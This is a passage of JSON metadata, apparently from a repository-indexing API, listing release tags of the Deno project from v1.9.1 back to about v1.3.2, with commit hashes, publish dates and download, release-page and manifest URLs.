ub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.00